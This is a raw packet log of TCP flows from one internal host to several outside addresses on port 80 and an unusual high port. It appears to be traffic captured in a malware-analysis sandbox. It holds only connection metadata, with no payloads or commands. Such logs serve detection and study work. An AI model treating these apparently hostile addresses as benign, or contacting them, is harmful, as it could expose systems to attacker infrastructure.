Sep 3, 2024 17:13:08.938127041 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.938158035 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.938174009 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938195944 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938208103 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938218117 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938219070 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.938230038 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938241959 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938251019 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.938255072 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938272953 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.938288927 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.938461065 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938472033 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938482046 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938493013 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938503027 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938509941 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.938519001 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938532114 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938539982 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.938544035 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938558102 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.938575983 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.938610077 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.989289045 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989303112 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989314079 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989371061 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.989404917 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.989720106 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989732981 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989746094 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989758968 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989770889 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989774942 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.989782095 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989804029 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.989815950 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.989857912 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989870071 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989902973 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.989916086 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989928961 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989939928 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989950895 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989960909 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.989963055 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990000010 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990029097 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990052938 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990104914 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990173101 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990186930 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990199089 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990211964 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990220070 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990221977 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990236044 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990237951 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990253925 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990264893 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990277052 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990284920 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990293026 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990314007 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990406036 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990417957 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990427971 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990442038 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990453959 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990459919 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990466118 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990475893 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990492105 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990530968 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990812063 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990823984 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990833998 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990848064 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990863085 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990894079 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.990967989 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990984917 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.990997076 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.991007090 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.991017103 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.991019011 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.991030931 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.991041899 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.991041899 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.991065025 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.991070032 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.991079092 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.991091013 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:08.991101980 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:08.991126060 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.033477068 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.033493042 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.033504009 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.033561945 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.033569098 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.033581018 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.033584118 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.033593893 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.033606052 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.033617020 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.033644915 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.033833027 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.033844948 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.033855915 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.033868074 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.033879042 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.033885002 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.033905029 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.033910036 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.034008980 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.034056902 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.034087896 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.034100056 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.034111023 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.034121990 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.034132004 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.034141064 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.034148932 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.034152985 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.034166098 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.034185886 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.034203053 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.054645061 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.054667950 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.054678917 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.054727077 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.054769039 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.054825068 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.054836035 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.054852962 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.054863930 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.054873943 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.054891109 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.054922104 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.055111885 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055123091 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055134058 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055145025 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055155993 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055156946 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.055169106 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055174112 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.055182934 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055217981 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.055242062 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.055425882 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055438042 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055448055 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055460930 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055474997 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.055505037 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.055517912 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055530071 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055531025 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.055542946 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055553913 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055558920 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.055567026 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055577040 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.055579901 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055593014 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055603981 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.055612087 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.055628061 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.055644989 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.056175947 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056186914 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056196928 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056207895 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056219101 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056231976 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056334019 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.056456089 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056466103 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056508064 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.056617022 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056627989 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056633949 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056643963 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056654930 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056665897 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056673050 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.056677103 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056689978 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056691885 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.056703091 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056714058 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.056720972 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056732893 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056735992 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.056745052 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056756020 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.056757927 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.056791067 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.087037086 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.087059975 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.087071896 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.087130070 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.087167025 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.087184906 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.087198019 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.087230921 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.087250948 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.087261915 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.087295055 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.087822914 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.087872028 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.087874889 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.087884903 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.087910891 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.087932110 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:09.087968111 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.087979078 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:09.088009119 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:10.163213015 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:10.163750887 CEST	49716	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:10.168400049 CEST	80	49713	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:10.168457031 CEST	49713	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:10.168633938 CEST	80	49716	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:10.168692112 CEST	49716	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:10.256920099 CEST	49716	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:10.262914896 CEST	80	49716	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:10.974071026 CEST	80	49716	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:10.974129915 CEST	49716	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:11.025495052 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:11.030359030 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.030432940 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:11.030536890 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:11.035321951 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.902905941 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.902926922 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.902940989 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.902992010 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:11.903053999 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.903085947 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:11.903141975 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:11.903197050 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.903247118 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.903259039 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.903269053 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.903301954 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.903311968 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.903331995 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:11.903441906 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:11.907826900 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.907850027 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.907860994 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:11.907913923 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.005943060 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.005954981 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.006022930 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.006118059 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.042617083 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:12.048108101 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:12.048757076 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:12.053497076 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.053515911 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.053548098 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.053592920 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.053613901 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.053630114 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.053657055 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.053708076 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.053950071 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.053966045 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.054071903 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.054142952 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.054193974 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.054204941 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.054235935 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.054322004 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.054332018 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.054342031 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.054362059 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.054362059 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.054559946 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.055118084 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.055192947 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.055202961 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.055270910 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.055282116 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.055290937 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.055304050 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.055361032 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.055361032 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.056099892 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.056138992 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.056149006 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.056227922 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.056252003 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.056349039 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.064699888 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:12.069514990 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:12.151382923 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.151396036 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.151407003 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.151417017 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.151452065 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.151557922 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.217416048 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.217462063 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.217473984 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.217494011 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.217564106 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.217570066 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.217576027 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.217587948 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.217616081 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.217677116 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.217684984 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.217771053 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.217804909 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.217842102 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.217853069 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.217895985 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.218075991 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.218087912 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.218105078 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.218115091 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.218147993 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.218173027 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.218204021 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.218422890 CEST	49719	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:12.218511105 CEST	80	49719	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:12.218555927 CEST	80	49719	185.215.113.26	192.168.2.8
